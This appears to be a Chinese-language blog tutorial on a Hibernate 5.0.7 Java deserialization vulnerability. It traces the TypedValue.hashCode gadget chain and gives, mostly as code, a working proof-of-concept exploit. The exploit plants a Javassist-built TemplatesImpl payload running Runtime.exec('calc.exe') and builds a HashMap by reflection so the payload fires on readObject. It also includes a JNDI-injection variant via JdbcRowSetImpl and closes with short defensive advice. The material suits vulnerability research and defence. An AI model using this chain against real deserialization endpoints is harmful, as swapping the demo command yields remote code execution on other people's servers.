Hibernate反序列化漏洞分析与POC编写<\/h1>

1. 环境准备<\/h2>
依赖环境<\/strong>：<\/p>
<dependency><\/span>
<\/span><\/span>    <groupId><\/span>org.hibernate<\/groupId><\/span>
<\/span><\/span>    <artifactId><\/span>hibernate-core<\/artifactId><\/span>
<\/span><\/span>    <version><\/span>5.0.7.Final<\/version><\/span>
<\/span><\/span><\/dependency><\/span>
<\/span><\/span><dependency><\/span>
<\/span><\/span>    <groupId><\/span>commons-collections<\/groupId><\/span>
<\/span><\/span>    <artifactId><\/span>commons-collections<\/artifactId><\/span>
<\/span><\/span>    <version><\/span>3.2.1<\/version><\/span>
<\/span><\/span><\/dependency><\/span>
<\/span><\/span><dependency><\/span>
<\/span><\/span>    <groupId><\/span>org.javassist<\/groupId><\/span>
<\/span><\/span>    <artifactId><\/span>javassist<\/artifactId><\/span>
<\/span><\/span>    <version><\/span>3.25.0-GA<\/version><\/span>
<\/span><\/span><\/dependency><\/span>
<\/span><\/span><\/code><\/pre>JDK版本<\/strong>：建议使用低版本JDK进行复现<\/p>
2. 漏洞调用链分析<\/h2>
完整的调用链如下：<\/p>
org.hibernate.property.access.spi.GetterMethodImpl.get()
org.hibernate.tuple.component.AbstractComponentTuplizer.getPropertyValue()
org.hibernate.type.ComponentType.getPropertyValue(C)
org.hibernate.type.ComponentType.getHashCode()
org.hibernate.engine.spi.TypedValue$1.initialize()
org.hibernate.engine.spi.TypedValue$1.initialize()
org.hibernate.internal.util.ValueHolder.getValue()
org.hibernate.engine.spi.TypedValue.hashCode()
<\/code><\/pre>
2.1 关键点分析<\/h3>


GetterMethodImpl#get()<\/strong>:<\/p>

直接调用getterMethod的invoke方法<\/li>
可利用TemplatesImpl链或JNDI注入<\/li>
<\/ul>
<\/li>

调用链回溯<\/strong>:<\/p>

通过查找Getter类的实现找到调用get方法的位置<\/li>
在AbstractComponentTuplizer.getPropertyValue中调用了get方法<\/li>
<\/ul>
<\/li>

hashCode触发点<\/strong>:<\/p>

调用链中出现hashCode方法，可联想到Commons Collections链<\/li>
最终在TypedValue.hashCode()中触发漏洞<\/li>
<\/ul>
<\/li>
<\/ol>
3. POC编写详解<\/h2>
3.1 创建恶意TemplatesImpl对象<\/h3>
使用Javassist动态创建恶意类：<\/p>
public<\/span> static<\/span> Object createTemplatesImpl<\/span>()<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>    ClassPool pool =<\/span> ClassPool.<\/span>getDefault<\/span>();<\/span>
<\/span><\/span>    CtClass ctClass =<\/span> pool.<\/span>makeClass<\/span>(<\/span>"i"<\/span>);<\/span>
<\/span><\/span>    CtClass superClass =<\/span> pool.<\/span>get<\/span>(<\/span>"com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet"<\/span>);<\/span>
<\/span><\/span>    ctClass.<\/span>setSuperclass<\/span>(<\/span>superClass);<\/span>
<\/span><\/span>    CtConstructor constructor =<\/span> ctClass.<\/span>makeClassInitializer<\/span>();<\/span>
<\/span><\/span>    constructor.<\/span>setBody<\/span>(<\/span>"Runtime.getRuntime().exec(\"calc.exe\");"<\/span>);<\/span>
<\/span><\/span>    byte<\/span>[]<\/span> bytes =<\/span> ctClass.<\/span>toBytecode<\/span>();<\/span>
<\/span><\/span>    
<\/span><\/span>    TemplatesImpl templatesImpl =<\/span> new<\/span> TemplatesImpl();<\/span>
<\/span><\/span>    setFieldValue(<\/span>templatesImpl,<\/span> "_bytecodes"<\/span>,<\/span> new<\/span> byte<\/span>[][]{<\/span>bytes});<\/span>
<\/span><\/span>    setFieldValue(<\/span>templatesImpl,<\/span> "_name"<\/span>,<\/span> "a"<\/span>);<\/span>
<\/span><\/span>    setFieldValue(<\/span>templatesImpl,<\/span> "_tfactory"<\/span>,<\/span> null<\/span>);<\/span>
<\/span><\/span>    return<\/span> templatesImpl;<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>3.2 创建Getter数组<\/h3>
Object tpl =<\/span> (<\/span>TemplatesImpl)<\/span> Gadgets.<\/span>createTemplatesImpl<\/span>();<\/span>
<\/span><\/span>Class tplClass =<\/span> tpl.<\/span>getClass<\/span>();<\/span>
<\/span><\/span>Class getter =<\/span> Class.<\/span>forName<\/span>(<\/span>"org.hibernate.property.access.spi.Getter"<\/span>);<\/span>
<\/span><\/span>Object g =<\/span> new<\/span> GetterMethodImpl(<\/span>tplClass,<\/span> "test"<\/span>,<\/span> tplClass.<\/span>getDeclaredMethod<\/span>(<\/span>"getOutputProperties"<\/span>));<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 创建Getter数组
<\/span><\/span><\/span><\/span>Object getters =<\/span> Array.<\/span>newInstance<\/span>(<\/span>getter,<\/span> 1<\/span>);<\/span>
<\/span><\/span>Array.<\/span>set<\/span>(<\/span>getters,<\/span> 0<\/span>,<\/span> g);<\/span>
<\/span><\/span><\/code><\/pre>3.3 构造ComponentTuplizer<\/h3>
使用反射绕过构造函数：<\/p>
public<\/span> static<\/span> <<\/span>T><\/span> T createWithoutConstructor<\/span>(<\/span>Class<<\/span>T><\/span> classToInstantiate)<\/span> 
<\/span><\/span>    throws<\/span> NoSuchMethodException,<\/span> InstantiationException,<\/span> 
<\/span><\/span>           IllegalAccessException,<\/span> InvocationTargetException {<\/span>
<\/span><\/span>    return<\/span> createWithConstructor(<\/span>classToInstantiate,<\/span> Object.<\/span>class<\/span>,<\/span> 
<\/span><\/span>                               new<\/span> Class[<\/span>0<\/span>],<\/span> new<\/span> Object[<\/span>0<\/span>]);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> static<\/span> <<\/span>T><\/span> T createWithConstructor<\/span>(<\/span>Class<<\/span>T><\/span> classToInstantiate,<\/span> 
<\/span><\/span>                                        Class<?<\/span> super<\/span> T><\/span> constructorClass,<\/span> 
<\/span><\/span>                                        Class<?>[]<\/span> consArgTypes,<\/span> 
<\/span><\/span>                                        Object[]<\/span> consArgs)<\/span> 
<\/span><\/span>    throws<\/span> NoSuchMethodException,<\/span> InstantiationException,<\/span> 
<\/span><\/span>           IllegalAccessException,<\/span> InvocationTargetException {<\/span>
<\/span><\/span>    Constructor<?<\/span> super<\/span> T><\/span> objCons =<\/span> constructorClass.<\/span>getDeclaredConstructor<\/span>(<\/span>consArgTypes);<\/span>
<\/span><\/span>    objCons.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>    Constructor<?><\/span> sc =<\/span> ReflectionFactory.<\/span>getReflectionFactory<\/span>()<\/span>
<\/span><\/span>                          .<\/span>newConstructorForSerialization<\/span>(<\/span>classToInstantiate,<\/span> objCons);<\/span>
<\/span><\/span>    sc.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>    return<\/span> (<\/span>T)<\/span>sc.<\/span>newInstance<\/span>(<\/span>consArgs);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>设置ComponentTuplizer属性：<\/p>
AbstractComponentTuplizer tup =<\/span> createWithoutConstructor(<\/span>PojoComponentTuplizer.<\/span>class<\/span>);<\/span>
<\/span><\/span>setFieldValueExtend(<\/span>tup,<\/span> AbstractComponentTuplizer.<\/span>class<\/span>,<\/span> "getters"<\/span>,<\/span> getters);<\/span>
<\/span><\/span><\/code><\/pre>3.4 构造ComponentType<\/h3>
ComponentType t =<\/span> createWithConstructor(<\/span>ComponentType.<\/span>class<\/span>,<\/span> 
<\/span><\/span>                                      AbstractType.<\/span>class<\/span>,<\/span> 
<\/span><\/span>                                      new<\/span> Class[<\/span>0<\/span>],<\/span> 
<\/span><\/span>                                      new<\/span> Object[<\/span>0<\/span>]);<\/span>
<\/span><\/span>setFieldValue(<\/span>t,<\/span> "componentTuplizer"<\/span>,<\/span> tup);<\/span>
<\/span><\/span>setFieldValue(<\/span>t,<\/span> "propertySpan"<\/span>,<\/span> 1<\/span>);<\/span>
<\/span><\/span>setFieldValue(<\/span>t,<\/span> "propertyTypes"<\/span>,<\/span> new<\/span> Type[]<\/span> {<\/span> t });<\/span>
<\/span><\/span><\/code><\/pre>3.5 构造TypedValue<\/h3>
TypedValue v1 =<\/span> new<\/span> TypedValue(<\/span>t,<\/span> null<\/span>);<\/span>
<\/span><\/span>setFieldValue(<\/span>v1,<\/span> "value"<\/span>,<\/span> tpl);<\/span>
<\/span><\/span>setFieldValue(<\/span>v1,<\/span> "type"<\/span>,<\/span> t);<\/span>
<\/span><\/span><\/code><\/pre>3.6 构造恶意HashMap<\/h3>
直接使用HashMap.put会导致本地执行，需要使用反射构造：<\/p>
public<\/span> static<\/span> HashMap makeMap<\/span>(<\/span>Object v1,<\/span> Object v2)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>    HashMap s =<\/span> new<\/span> HashMap();<\/span>
<\/span><\/span>    setFieldValue(<\/span>s,<\/span> "size"<\/span>,<\/span> 2<\/span>);<\/span>
<\/span><\/span>    
<\/span><\/span>    Class nodeC;<\/span>
<\/span><\/span>    try<\/span> {<\/span>
<\/span><\/span>        nodeC =<\/span> Class.<\/span>forName<\/span>(<\/span>"java.util.HashMap$Node"<\/span>);<\/span>
<\/span><\/span>    }<\/span> catch<\/span> (<\/span>ClassNotFoundException e)<\/span> {<\/span>
<\/span><\/span>        nodeC =<\/span> Class.<\/span>forName<\/span>(<\/span>"java.util.HashMap$Entry"<\/span>);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    Constructor nodeCons =<\/span> nodeC.<\/span>getDeclaredConstructor<\/span>(<\/span>int<\/span>.<\/span>class<\/span>,<\/span> Object.<\/span>class<\/span>,<\/span> 
<\/span><\/span>                                                      Object.<\/span>class<\/span>,<\/span> nodeC);<\/span>
<\/span><\/span>    nodeCons.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>    
<\/span><\/span>    Object tbl =<\/span> Array.<\/span>newInstance<\/span>(<\/span>nodeC,<\/span> 2<\/span>);<\/span>
<\/span><\/span>    Array.<\/span>set<\/span>(<\/span>tbl,<\/span> 0<\/span>,<\/span> nodeCons.<\/span>newInstance<\/span>(<\/span>0<\/span>,<\/span> v1,<\/span> v1,<\/span> null<\/span>));<\/span>
<\/span><\/span>    Array.<\/span>set<\/span>(<\/span>tbl,<\/span> 1<\/span>,<\/span> nodeCons.<\/span>newInstance<\/span>(<\/span>0<\/span>,<\/span> v2,<\/span> v2,<\/span> null<\/span>));<\/span>
<\/span><\/span>    
<\/span><\/span>    setFieldValue(<\/span>s,<\/span> "table"<\/span>,<\/span> tbl);<\/span>
<\/span><\/span>    return<\/span> s;<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>4. 完整POC代码<\/h2>
package<\/span> org.example;<\/span>
<\/span><\/span>
<\/span><\/span>import<\/span> com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;<\/span>
<\/span><\/span>import<\/span> org.hibernate.engine.spi.TypedValue;<\/span>
<\/span><\/span>import<\/span> org.hibernate.property.access.spi.GetterMethodImpl;<\/span>
<\/span><\/span>import<\/span> org.hibernate.tuple.component.AbstractComponentTuplizer;<\/span>
<\/span><\/span>import<\/span> org.hibernate.tuple.component.PojoComponentTuplizer;<\/span>
<\/span><\/span>import<\/span> org.hibernate.type.AbstractType;<\/span>
<\/span><\/span>import<\/span> org.hibernate.type.ComponentType;<\/span>
<\/span><\/span>import<\/span> org.hibernate.type.Type;<\/span>
<\/span><\/span>import<\/span> sun.reflect.ReflectionFactory;<\/span>
<\/span><\/span>
<\/span><\/span>import<\/span> java.io.ByteArrayInputStream;<\/span>
<\/span><\/span>import<\/span> java.io.ByteArrayOutputStream;<\/span>
<\/span><\/span>import<\/span> java.io.ObjectInputStream;<\/span>
<\/span><\/span>import<\/span> java.io.ObjectOutputStream;<\/span>
<\/span><\/span>import<\/span> java.lang.reflect.*;<\/span>
<\/span><\/span>import<\/span> java.util.HashMap;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> POC<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        \/\/ 创建恶意对象
<\/span><\/span><\/span><\/span>        Object tpl =<\/span> (<\/span>TemplatesImpl)<\/span> Gadgets.<\/span>createTemplatesImpl<\/span>();<\/span>
<\/span><\/span>        Class tplClass =<\/span> tpl.<\/span>getClass<\/span>();<\/span>
<\/span><\/span>        Class getter =<\/span> Class.<\/span>forName<\/span>(<\/span>"org.hibernate.property.access.spi.Getter"<\/span>);<\/span>
<\/span><\/span>        Object g =<\/span> new<\/span> GetterMethodImpl(<\/span>tplClass,<\/span> "test"<\/span>,<\/span> tplClass.<\/span>getDeclaredMethod<\/span>(<\/span>"getOutputProperties"<\/span>));<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 创建Getter数组
<\/span><\/span><\/span><\/span>        Object getters =<\/span> Array.<\/span>newInstance<\/span>(<\/span>getter,<\/span> 1<\/span>);<\/span>
<\/span><\/span>        Array.<\/span>set<\/span>(<\/span>getters,<\/span> 0<\/span>,<\/span> g);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 构造ComponentTuplizer
<\/span><\/span><\/span><\/span>        AbstractComponentTuplizer tup =<\/span> createWithoutConstructor(<\/span>PojoComponentTuplizer.<\/span>class<\/span>);<\/span>
<\/span><\/span>        setFieldValueExtend(<\/span>tup,<\/span> AbstractComponentTuplizer.<\/span>class<\/span>,<\/span> "getters"<\/span>,<\/span> getters);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 构造ComponentType
<\/span><\/span><\/span><\/span>        ComponentType t =<\/span> createWithConstructor(<\/span>ComponentType.<\/span>class<\/span>,<\/span> AbstractType.<\/span>class<\/span>,<\/span> 
<\/span><\/span>                                             new<\/span> Class[<\/span>0<\/span>],<\/span> new<\/span> Object[<\/span>0<\/span>]);<\/span>
<\/span><\/span>        setFieldValue(<\/span>t,<\/span> "componentTuplizer"<\/span>,<\/span> tup);<\/span>
<\/span><\/span>        setFieldValue(<\/span>t,<\/span> "propertySpan"<\/span>,<\/span> 1<\/span>);<\/span>
<\/span><\/span>        setFieldValue(<\/span>t,<\/span> "propertyTypes"<\/span>,<\/span> new<\/span> Type[]<\/span> {<\/span> t });<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 构造TypedValue
<\/span><\/span><\/span><\/span>        TypedValue v1 =<\/span> new<\/span> TypedValue(<\/span>t,<\/span> null<\/span>);<\/span>
<\/span><\/span>        setFieldValue(<\/span>v1,<\/span> "value"<\/span>,<\/span> tpl);<\/span>
<\/span><\/span>        setFieldValue(<\/span>v1,<\/span> "type"<\/span>,<\/span> t);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 构造恶意HashMap
<\/span><\/span><\/span><\/span>        HashMap hashMap =<\/span> makeMap(<\/span>v1,<\/span> "String"<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 序列化测试
<\/span><\/span><\/span><\/span>        ByteArrayOutputStream byteArrayOutputStream =<\/span> new<\/span> ByteArrayOutputStream();<\/span>
<\/span><\/span>        ObjectOutputStream objectOutputStream =<\/span> new<\/span> ObjectOutputStream(<\/span>byteArrayOutputStream);<\/span>
<\/span><\/span>        objectOutputStream.<\/span>writeObject<\/span>(<\/span>hashMap);<\/span>
<\/span><\/span>        
<\/span><\/span>        ObjectInputStream objectInputStream =<\/span> new<\/span> ObjectInputStream(<\/span>
<\/span><\/span>            new<\/span> ByteArrayInputStream(<\/span>byteArrayOutputStream.<\/span>toByteArray<\/span>()));<\/span>
<\/span><\/span>        objectInputStream.<\/span>readObject<\/span>();<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 辅助方法省略...
<\/span><\/span><\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>5. 关键技术与注意事项<\/h2>


反射绕过构造函数<\/strong>：<\/p>

使用ReflectionFactory.newConstructorForSerialization创建绕过构造函数的实例<\/li>
特别适用于需要复杂构造参数的对象<\/li>
<\/ul>
<\/li>

设置父类字段<\/strong>：<\/p>

普通反射无法设置父类字段，需要指定具体类：<\/li>
<\/ul>
public<\/span> static<\/span> void<\/span> setFieldValueExtend<\/span>(<\/span>Object obj,<\/span> Class clazz,<\/span> String field,<\/span> Object arg)<\/span> 
<\/span><\/span>    throws<\/span> Exception {<\/span>
<\/span><\/span>    Field f =<\/span> clazz.<\/span>getDeclaredField<\/span>(<\/span>field);<\/span>
<\/span><\/span>    f.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>    f.<\/span>set<\/span>(<\/span>obj,<\/span> arg);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre><\/li>

避免本地执行<\/strong>：<\/p>

直接使用HashMap.put会导致本地执行命令<\/li>
必须通过反射构造HashMap内部结构<\/li>
<\/ul>
<\/li>

版本适配<\/strong>：<\/p>

不同Hibernate版本可能需要调整实现<\/li>
JDK版本影响较大，建议使用低版本JDK复现<\/li>
<\/ul>
<\/li>
<\/ol>
6. 扩展利用<\/h2>
除了TemplatesImpl链，还可以结合JNDI注入：<\/p>
\/\/ 修改GetterMethodImpl创建部分
<\/span><\/span><\/span><\/span>Object g =<\/span> new<\/span> GetterMethodImpl(<\/span>JdbcRowSetImpl.<\/span>class<\/span>,<\/span> "dataSourceName"<\/span>,<\/span> 
<\/span><\/span>                              JdbcRowSetImpl.<\/span>class<\/span>.<\/span>getMethod<\/span>(<\/span>"setDataSourceName"<\/span>,<\/span> String.<\/span>class<\/span>));<\/span>
<\/span><\/span><\/code><\/pre>7. 防御建议<\/h2>

升级Hibernate到安全版本<\/li>
限制反序列化操作<\/li>
使用安全管理器限制危险操作<\/li>
监控和过滤可疑的序列化数据<\/li>
<\/ol>
通过以上分析，我们深入理解了Hibernate反序列化漏洞的原理和利用方式，掌握了从零开始构造POC的关键技术。<\/p>